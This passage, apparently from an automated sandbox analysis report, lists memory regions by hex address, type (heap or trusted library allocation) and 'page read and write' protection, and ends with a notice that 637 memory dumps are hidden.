page read and write
7FF816590000
trusted library allocation
page read and write
1B0AAD67000
heap
page read and write
1B0AAB80000
trusted library allocation
page read and write
1B093FDE000
trusted library allocation
page read and write
216B8820000
trusted library allocation
page read and write
1B0AAB80000
trusted library allocation
page read and write
15CFEF08000
heap
page read and write
1B0AAD0E000
heap
page read and write
There are 637 hidden memdumps, click here to show them.